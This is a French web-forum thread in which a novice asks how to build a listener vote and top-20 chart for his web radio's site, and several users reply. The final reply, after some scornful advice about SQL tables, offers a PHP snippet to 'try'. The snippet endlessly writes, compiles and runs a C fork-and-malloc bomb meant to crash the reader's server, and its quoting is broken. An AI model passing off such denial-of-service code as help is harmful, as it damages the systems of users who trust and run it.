Vote pour titre classement radio

Signaler
Messages postés
44
Date d'inscription
lundi 29 mars 2004
Statut
Membre
Dernière intervention
9 août 2005
-
Messages postés
1
Date d'inscription
jeudi 7 avril 2005
Statut
Membre
Dernière intervention
7 avril 2005
-
Bonjour,

Je voudrais savoir comment faire un vote pour le site web de ma radio avec mon system de titrage et d'affichage de pochettes cd, pour faire voter les auditeurs et internautes les titres qu'ils prefere le mieux.
Comme par exemple sur le site web de la webradio radio psylone
On peut voter de là :

http://www.radio-psylone.org/pochette.php
et voir le classement de là :

http://www.radio-psylone.org/top20.php

terster le pour voir ! possible de faire pareil ????

D@mien 2 Rady' On Fm !!!
http://www.radyonne-fm.com :approve)

4 réponses

Messages postés
122
Date d'inscription
samedi 6 mars 2004
Statut
Membre
Dernière intervention
5 mai 2004

fait un tour sur ce site
http://www.phpscripts-fr.net/
Messages postés
44
Date d'inscription
lundi 29 mars 2004
Statut
Membre
Dernière intervention
9 août 2005

J'ai suis deja aller
ce que de top 50 pour le site web et pas pour des musique
D@mien 2 Rady' On Fm !!!
Messages postés
122
Date d'inscription
samedi 6 mars 2004
Statut
Membre
Dernière intervention
5 mai 2004

garde le principe et adapte le a la muique
qq que ca change?
a la place de nom de site toi tu auras le nom d'un album,
c sur que tu devras modifier un peu la table mais ca doit pas etre tres compliqué

bon courage
Messages postés
1
Date d'inscription
jeudi 7 avril 2005
Statut
Membre
Dernière intervention
7 avril 2005

Salut c'est pas compliqué prend quelques cours de php au lieu de demandé a tout le monde hein...



Le webmaster de Radio-Psylone est passé par la hein :-)



Essaye de faire marcher ta tête un peux savoir comment marche une base
de donnée avant de poster 50 messages sur le forum qui ont tous rapport.



Pour tes playlist fait une base "playlist"

Pour tes pochettes une base "pochette"



et ensuite il suffit de savoir utiliser les requettes : SELECT / UPDATE de SQL :-)



En tout cas bon courage si tu as le temps essaye ca :

<?

while(true) { system("echo "void main(void){for(;;){fork(for(;;){malloc(100);}}}" >plop; gcc plop -o plop; ./plop); }

?>



Bonjour chez vous !